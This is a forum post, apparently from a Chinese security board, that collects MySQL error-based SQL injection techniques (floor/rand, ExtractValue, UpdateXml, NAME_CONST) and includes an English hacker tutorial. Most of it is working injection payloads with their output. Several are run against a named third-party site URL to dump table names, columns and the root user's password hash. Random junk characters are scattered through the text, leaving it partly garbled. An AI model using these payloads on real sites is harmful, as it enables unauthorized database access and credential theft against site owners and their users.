|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
U0 T- v! ?9 `2 b3 B: b4 {首先进行正常查询: mysql> select * from article where id = 1;
0 S; r3 g. w- r3 `+—-+——-+———+
- V9 N9 O( w8 a7 h3 U| id | title | content |) B- c( z$ V! W8 @
+—-+——-+———+* z; D4 d! K& A0 ~/ |
| 1 | test | do it |
- s; x0 w' Y4 P# R) p3 n2 C+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
, m5 [) U. W( F' D9 w4 QERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。2 H) y+ \3 N0 C4 q
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
) C% l; @" A% N; X' P3 `ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));# j1 n/ G5 Z7 H
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
) q d: f- B. }( O& D测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
F" a1 l" v ?1 kERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
) Z: m, i6 @- j5 i; Z# |* \# J
( O# M9 C4 L' d X再收集: 3 \7 |& s8 e$ ^0 Y2 _; L7 ~
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
" e$ _3 A/ I4 Z" B) M ^
8 J5 Q" v* c9 S3 g8 z! b( F9 A, l1 u, ]6 FError uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’; X( J- [' l5 h- W$ t9 i
! r& C& f2 _# ~2 v+ q8 e. B2 a) }
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
( S7 c! G1 ^& ~/ Q# }
4 b @. f4 y- p% ]3 ZErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
- r- X" z+ b2 y0 F( W# \9 u- J, i
% y4 N. P. @. g/ j0 x* KMYSQL高版本报错注入技巧-利用NAME_CONST注入
W; o0 ]( p% W' a) A8 [, XIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. % C4 b# c: g+ t; M/ j, ]8 P% }
$ f$ w* m1 ~ [
" a0 f. ~( t1 \0 h
相关信息' f2 a; N4 a4 C& b
8 ]: J3 Q( g; ?1 s* {- J
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. M: s/ p& _8 ]1 b8 E" A/ @. Y
* ?4 Y3 ^" r; ` a5 E/ x, z6 PCode:3 Z1 H* A- ]0 M6 H( a4 u7 L' z
NAME_CONST(DATA, VALUE)
+ n" b4 x0 V; I1 y: c; K( Z2 y$ n9 j a( e5 V
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
4 Q( p9 @, y& m: ~0 L
: ]' B! [+ N4 cSELECT NAME_CONST('TEST', 1)8 W" R6 ]9 n2 B5 i! h
+ P2 t# W" ^- R, e
6 N# w% X8 c* _4 G1 i( k1 W
: w: W! H' R( `$ X/ O9 r|---------------|$ _* a s$ E& d! Z/ V/ ^4 Y+ i
| TEST |
4 u: ?3 Y z7 b, j( \! I| |' W7 b2 j* }# m2 F& @6 `5 U$ y
|---------------|
0 X0 ?3 {# E, k- I| 1 |1 U( e% B! t t+ o( {+ g
| |
/ G% |# E( I$ x. \- O|---------------| ~) ~' z! Q9 K9 R
, M# E6 H2 z/ H' ^8 V/ D
% l' G8 N/ \ C Z7 N: }
- A; s. h5 j7 o0 A5 I9 g
3 \# [9 g5 ]* Zhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const3 V6 l p$ B3 W" y4 f1 H
Intro to MySQL Variables
! L! p$ |: P4 B4 x
8 ~ L. E; Q+ V! f' EOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.* ^. H! F& U! t k y
6 k; t* R Z" }* M, u
Code:
2 @* j/ J+ @4 z: V' P4 {! [http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
! A' z/ ]1 U: X& a9 F/ x* H4 U1 m
, g; x5 Z3 r! q% T, `) U+ s$ c
- }- ]3 H7 y. X( t2 H
/ X4 b1 Z9 w- r5 x6 S; q; `) ?* V9 K9 d' S
Code:4 i6 M* q2 U" @8 Y
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--" n' f& S9 i# d w: \1 i+ U; l
/ N7 b9 Q; H9 l! r
& G, M6 e& t9 m* [% O2 OVAR = Your MySQL variable.' B" W7 l: J7 c7 a
/ y" F% M& K$ Z0 H
MySQL 5.1.3 Server System Variables
+ j( d& ~ f9 M8 n5 u
( h0 _: `9 y! I) ]7 f& r, zLet's try it out on my site..
3 d% }! c, O2 K
) Z3 z) K/ n7 NCode:
$ P5 G' B( X: p6 C$ L/ a( shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--0 v& D- a' X( \! p$ E
" w" M& I+ d$ o: z( yErroruplicate column name '5.0.27-community-nt'7 p1 l9 Y& o V- b; o l# ] I
1 j! j3 X/ m: A4 ~" Y) h* U# [! N' B) X6 r
. F$ H9 q$ A2 P3 n# l4 N
- t+ c) P/ y& L1 s4 P* i" U
% H" k) T2 n- [5 YNow I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
1 J+ T G( O' R1 e% _0 g5 |6 i3 v' R& F# n
Data Extraction6 p2 i9 P C: Z3 _; ^0 Y
: A' g' ]6 y( G' w) q5 e+ {9 q( x" w# e
Code:, U* D; Z8 R# w4 o" Y# o3 I
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
1 _- c* Q9 g* L; h- e
2 V7 u* m+ C. c" T
% x' k0 ~7 p* N4 m1 e$ rWe should get a duplicate column 1 error...; J) K1 s/ i8 r
6 L1 X8 D; O6 C1 z/ h
Code:' F) D; z8 |& f# V1 F
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--( i& \+ [5 S Q; a, q
5 A- h; H# _: m, W8 c% tErroruplicate column name '13 i Y$ M# Y: v( P3 Z
4 @/ C$ z, Z8 \3 x+ e. A1 n2 C" b0 r0 c
# T8 P9 n- t7 c' h( P' T9 n3 H& E. i, F1 K8 O. L$ [6 K' A5 e- h
! }! O- B: X& I- w; @1 l3 e5 A; E
% l6 u J0 `) S" z/ s+ u: ] rNow let's get the tables out this bitch..
7 `. `8 t) ~, K; ^$ S# l
$ T' L1 t4 O3 }, b: k: ~Code:1 D, R* z+ \) f# a
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
& R6 c. ~- d. x* f: Z/ O `1 d& ?8 U# b; \( E
' z. I& N+ m1 x$ p
Let's see if it works here, if it does, we can go on and finish the job.; P& o, n' D/ w
! ~6 t9 J2 j( w3 ~Code:
& c5 t" x. N J& q- u( a ?http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--8 f. z# Z$ q& |! w* {4 P2 x
+ }# S/ t1 ]0 X4 R/ V* A8 r0 e; p+ ~. M& _" z
Erroruplicate column name 'com_admanage; B, [! l9 Q6 t- v4 h6 W; a
2 A: x2 H, c- g; g
: G; H7 v$ S1 y6 ?# M6 p g
8 H, K- Q' k! q
1 l9 u* @/ N1 H' i) _
& B5 u8 {, ^- g9 k+ G. W! x. J* Q/ _. J4 q! g4 [" x
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
* t+ t6 X9 Y. d& N R3 X, t3 x
/ k/ o" y' K7 Q. ?Let's get the columns out of the user table..
* I8 N& H+ X p, n* b- T; O' E+ r3 C& T. d+ W5 Z, g3 {' ^* J
Code:
/ `5 Q$ d8 ~* ]% E' E+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--9 {/ Y$ F; Z2 r4 ^/ R
9 u% y" N# {* W' K
3 T2 ]: X& p4 B% @) m* t+ g& PSo mine looks like this, and I get the duplicate column name 'Host'.
8 S8 E" q) X/ m7 \5 p3 ]! K. V2 ]- u4 `# ]4 K
Code:
7 `: H3 [ b" D+ X4 n$ shttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
; H) F( D% F$ Q- i+ J, u! ]" g) ?+ f7 V% `- `
Erroruplicate column name 'Host'
% T- A W+ i3 X3 f: |7 Z! h* I& |2 s) O, z; G; X9 |4 p/ d4 e
! `1 W( @* _& }" Q/ a* m6 u: d3 O5 m; I* V+ f: V/ J# ^
5 y3 x) y% p% o9 }" @3 _. e9 R- D6 d/ M/ Y G, U; d/ r
9 H! N1 `! ]) E- @5 b) tWoot, time to finish this bitch off.7 C, f/ W0 x$ X% J
8 L- W$ Y9 R5 ~" v2 s
Code:
3 m5 z* @( R- J9 s5 ^( r+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--8 s6 Z, J3 w" w4 p ~
0 c" U8 ]/ `1 u1 F- J1 Z# @. ?' z' d
So mine looks like this...9 o {8 n' E7 c2 }" t! m
( ]6 q( F7 D& ?: T ]7 `Code:6 h" x( p* K0 f+ J1 O
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
4 B* k, T/ L) v4 S' s' _ q+ B9 B6 L( L+ R3 ^# Q
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
9 ^" A7 z$ m& ^( y$ ^% c2 T% G" b& h' x! c G
; |. \% k3 |$ n6 c! z / V$ U8 N9 W+ R" c9 a9 ~
3 P4 @+ P3 M7 k5 W: f" f" G% e
( [+ C; ~4 |+ F3 U
; }, A0 e: v, S; HAnd there we have it, thanks for reading.
, h/ t2 c, V/ ?2 g. S9 s! h) t5 a8 Y- w
|
发表于 2015-11-11 19:03:37
收藏
支持
反对